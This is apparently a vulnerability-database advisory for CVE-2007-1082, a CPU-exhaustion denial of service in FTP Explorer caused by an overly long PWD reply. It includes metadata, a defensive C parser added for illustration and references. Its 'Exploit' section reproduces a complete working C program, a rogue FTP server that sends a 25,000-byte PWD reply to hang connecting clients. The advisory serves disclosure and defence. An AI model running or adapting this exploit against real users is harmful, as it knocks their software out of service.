FTP Explorer PWD Parameter Denial-of-Service Vulnerability

Vulnerability ID: 1112254
Vulnerability type: Resource management error
Published: 2007-02-20
Updated: 2007-03-27
CVE ID: CVE-2007-1082
CNNVD-ID: CNNVD-200702-424
Platform: Windows
CVSS score: 7.1
|Vulnerability sources
https://www.exploit-db.com/exploits/3347
https://www.securityfocus.com/bid/22640
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-424
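|Vulnerability details
In FTP Explorer 1.0.1 Build 047 and other versions before 1.0.1.52, an overly long response from a remote server to the PWD command causes a denial of service (CPU resource consumption).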
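
An added example, not part of the original entry or of FTP Explorer's code: a client-side parser for the 257 PWD reply that rejects oversized or excessively deep paths before any further processing. The entry does not state the root cause of the CPU consumption; the function name parse_pwd_reply and the three MAX_* limits are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limits for illustration; not taken from FTP Explorer or an RFC. */
#define MAX_REPLY_LEN 1024  /* longest control-channel line accepted */
#define MAX_PATH_LEN   512  /* longest directory name accepted */
#define MAX_PATH_DEPTH  64  /* most '/' separators accepted */

enum pwd_status { PWD_OK = 0, PWD_TOO_LONG, PWD_MALFORMED, PWD_TOO_DEEP };

/* Parse a `257 "<dir>" ...` reply (RFC 959: an embedded quote is doubled).
 * reply need not be NUL-terminated; len is the number of bytes received.
 * On PWD_OK, out holds the NUL-terminated directory name. */
enum pwd_status parse_pwd_reply(const char *reply, size_t len,
                                char *out, size_t outsz)
{
    size_t i, n = 0, depth = 0;

    if (outsz == 0)
        return PWD_TOO_LONG;
    /* Reject up front so the work below is bounded by MAX_REPLY_LEN. */
    if (len > MAX_REPLY_LEN)
        return PWD_TOO_LONG;
    if (len < 6 || memcmp(reply, "257 \"", 5) != 0)
        return PWD_MALFORMED;

    for (i = 5; i < len; i++) {
        char c = reply[i];
        if (c == '\r' || c == '\n' || c == '\0')
            return PWD_MALFORMED;       /* line ended inside the quotes */
        if (c == '"') {
            if (i + 1 < len && reply[i + 1] == '"') {
                i++;                    /* doubled quote: literal '"' */
            } else {
                out[n] = '\0';          /* closing quote: path complete */
                return PWD_OK;
            }
        }
        if (c == '/' && ++depth > MAX_PATH_DEPTH)
            return PWD_TOO_DEEP;
        if (n + 1 >= outsz || n >= MAX_PATH_LEN)
            return PWD_TOO_LONG;
        out[n++] = c;
    }
    return PWD_MALFORMED;               /* no closing quote seen */
}
```

A caller that gets anything other than PWD_OK should drop the reply and close the control connection instead of passing the path on to directory-listing or UI code.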
|Exploit
/***********************************************************************************
*           FTP Explorer 1.0.1 Build 047 Remote DoS (CPU consumption)              *
*                                                                                  *
* FTP Explorer is prone to a DoS after receiving a long PWD response leading to    *
* 100% CPU consumption.                                                            *
* Have Fun!                                                                        *
*                                                                                  *
* Coded by Marsu <Marsupilamipowa@hotmail.fr>                                      *
***********************************************************************************/



#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
	char recvbuff[1024];
	char evilbuff[30000];
	sockaddr_in sin;
	int server,client;
	WSADATA wsaData;
	WSAStartup(MAKEWORD(1,1), &wsaData);

	server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	sin.sin_family = PF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);
	sin.sin_port = htons( 21 );
	bind(server,(SOCKADDR*)&sin,sizeof(sin));

	printf("[+] FTP Explorer Remote CPU consumption DoS\n");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
	printf("[*] Listening on port 21 ...\n");
	listen(server,5);
	printf("[*] Waiting for client ...\n");
	client=accept(server,NULL,NULL);
	printf("[+] Client connected\n");
	memcpy(evilbuff,"220 Hello there\r\n\0",18);

	if (send(client,evilbuff,strlen(evilbuff),0)==-1)
	{
		printf("[-] Error in send!\n");
		exit(-1);
	}

	//USER
	recv(client,recvbuff,1024,0);
	printf("%s", recvbuff);
    	memcpy(evilbuff,"331 \r\n\0",7);
	send(client,evilbuff,strlen(evilbuff),0);

	//PASS
	recv(client,recvbuff,1024,0);
	printf("%s", recvbuff);
	memcpy(evilbuff,"230 \r\n\0",7);
	send(client,evilbuff,strlen(evilbuff),0);

	//SYST 
	memset(recvbuff,'\0',1024);
	recv(client,recvbuff,1024,0);
	printf("%s", recvbuff);
	memcpy(evilbuff,"215 WINDOWS\r\n\0",14);
	send(client,evilbuff,strlen(evilbuff),0);

	//PWD
	int i=5;
	memset(recvbuff,'\0',1024);
	recv(client,recvbuff,1024,0);
	printf("%s", recvbuff);
	while (i<25000) {
		memset(evilbuff+i,'a',1);
		i++;
		memset(evilbuff+i,'/',1);
		i++;
	}
	memcpy(evilbuff,"257 \"",5);
	memcpy(evilbuff+25000,"\"\r\n\0",4);
	send(client,evilbuff,strlen(evilbuff),0);

	Sleep(100);
	printf("[+] Must be 100%% CPU consuming\n");
	closesocket(client);
	closesocket(server);
	return 0;

}

// milw0rm.com [2007-02-20]
|Affected products
FTPx FTP Explorer 1.0.1 Build 047
|References

Source: VIM
Name: 20070324 Vendor ACK for FTPx DoS (CVE-2007-1082)
Link: http://www.attrition.org/pipermail/vim/2007-March/001470.html
Source: XF
Name: ftpexplorer-pwd-dos (32606)
Link: http://xforce.iss.net/xforce/xfdb/32606
Source: BID
Name: 22640
Link: http://www.securityfocus.com/bid/22640
Source: MILW0RM
Name: 3347
Link: http://www.milw0rm.com/exploits/3347
Source: OSVDB
Name: 33496
Link: http://osvdb.org/33496